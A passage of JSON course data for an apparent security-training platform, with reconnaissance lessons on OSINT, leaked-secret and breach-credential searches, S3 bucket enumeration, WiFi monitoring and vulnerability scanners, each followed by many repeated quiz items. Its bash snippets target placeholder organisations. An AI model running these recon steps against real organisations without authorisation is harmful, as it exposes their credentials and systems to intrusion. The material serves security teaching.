NS records"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-osint-linkedin","cat":"Reconnaissance","title":"LinkedIn OSINT","diff":1,"xp":75,"intro":"Extract employee info from LinkedIn profiles.","sections":[{"type":"text","content":"LinkedIn reveals: job titles, technologies, projects, connections, and employment history. This maps the org structure and tech stack."},{"type":"code","lang":"bash","content":"linkedin2username -c 'Target Corp' -n target.com\n# Manual:\n# site:linkedin.com/in 'target corp'\n# Job postings reveal tech stack"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"LinkedIn OSINT provides...","opts":["Server IPs","Employee names, roles, and tech stack","Passwords","Network diagrams"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-osint-github-secrets","cat":"Reconnaissance","title":"GitHub Secret Scanning","diff":2,"xp":150,"intro":"Find leaked secrets in public repositories.","sections":[{"type":"text","content":"Trufflehog, git-secrets, and gitrob scan commit history for API keys, passwords, and tokens accidentally committed."},{"type":"code","lang":"bash","content":"trufflehog github --org targetcorp\ngit log -p | grep -iE 'password|api_key|secret|token'\ngitrob -org targetcorp"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"GitHub secret scanning checks...","opts":["File sizes","Commit history for accidentally committed credentials","Code quality","Dependencies"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-osint-email-breach","cat":"Reconnaissance","title":"Email Breach Intelligence","diff":3,"xp":200,"intro":"Search breach databases for leaked credentials.","sections":[{"type":"text","content":"Breach databases like HIBP, DeHashed, and h8mail reveal if target emails appeared in data breaches and what passwords were used."},{"type":"code","lang":"bash","content":"h8mail -t user@target.com --breach-comp\n# haveibeenpwned.com\n# dehashed.com\n# snusbase.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Breach data helps attackers because...","opts":["Data is encrypted","People reuse passwords across services","Breaches are rare","Data is outdated"],"ans":1},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-cloud-s3-bucket","cat":"Reconnaissance","title":"S3 Bucket Discovery","diff":2,"xp":150,"intro":"Find and access misconfigured AWS S3 buckets.","sections":[{"type":"text","content":"Brute-force common bucket name patterns and check for public read access."},{"type":"code","lang":"bash","content":"aws s3 ls s3://target-backup --no-sign-request\naws s3 ls s3://target-dev --no-sign-request\npython3 cloud_enum.py -k target"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Public S3 buckets allow...","opts":["Admin access","Anyone to list and download files","SSH access","Database access"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-wireless-scanning","cat":"Reconnaissance","title":"Wireless Network Discovery","diff":2,"xp":150,"intro":"Discover and profile WiFi networks.","sections":[{"type":"text","content":"Monitor mode captures beacons, probe requests, and client traffic. Map SSIDs, encryption types, channels, and connected clients."},{"type":"code","lang":"bash","content":"airmon-ng start wlan0\nairodump-ng wlan0mon\nairodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF wlan0mon"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Monitor mode captures...","opts":["Only your traffic","All wireless frames in range","Only encrypted traffic","Only TCP packets"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-passive-infrastructure","cat":"Reconnaissance","title":"Passive Infrastructure Mapping","diff":3,"xp":200,"intro":"Map target infrastructure without sending any packets.","sections":[{"type":"text","content":"Use BGP data, passive DNS, certificate transparency, and public databases to build a network map without touching the target."},{"type":"code","lang":"bash","content":"# ASN lookup\ncurl -s https://api.bgpview.io/search?query_term=target | jq '.data.asns'\n# Passive DNS\ncurl -s https://api.securitytrails.com/v1/domain/target.com/subdomains -H 'apikey:KEY'\n# Certificate transparency\ncurl -s 'https://crt.sh/?q=%25.target.com&output=json' | jq '.[].name_value'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Passive infrastructure mapping is...","opts":["Active scanning","Gathering info without sending packets to the target","Exploitation","Social engineering"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-vuln-scanning-nuclei","cat":"Reconnaissance","title":"Nuclei Vulnerability Scanner","diff":2,"xp":150,"intro":"Template-based vulnerability scanning at scale.","sections":[{"type":"text","content":"Nuclei uses YAML templates to detect CVEs, misconfigs, and exposed panels. Community templates cover thousands of checks."},{"type":"code","lang":"bash","content":"nuclei -u https://target.com\nnuclei -l urls.txt -t cves/\nnuclei -u target.com -t misconfiguration/ -t exposures/\nnuclei -u target.com -severity critical,high"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Nuclei uses which format for detection templates?","opts":["JSON","YAML","XML","INI"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-vuln-scanning-nikto","cat":"Reconnaissance","title":"Nikto Web Scanner","diff":1,"xp":75,"intro":"Scan web servers for known vulnerabilities and misconfigs.","sections":[{"type":"text","content":"Nikto checks for outdated software, dangerous files, server misconfigurations, and known vulnerabilities in web servers."},{"type":"code","lang":"bash","content":"nikto -h https://target.com\nnikto -h target.com -port 8080\nnikto -h target.com -Tuning x  # reverse tuning (all except x)"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Nikto primarily checks...","opts":["DNS records","Web server vulnerabilities and misconfigurations","Email servers","Database servers"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail 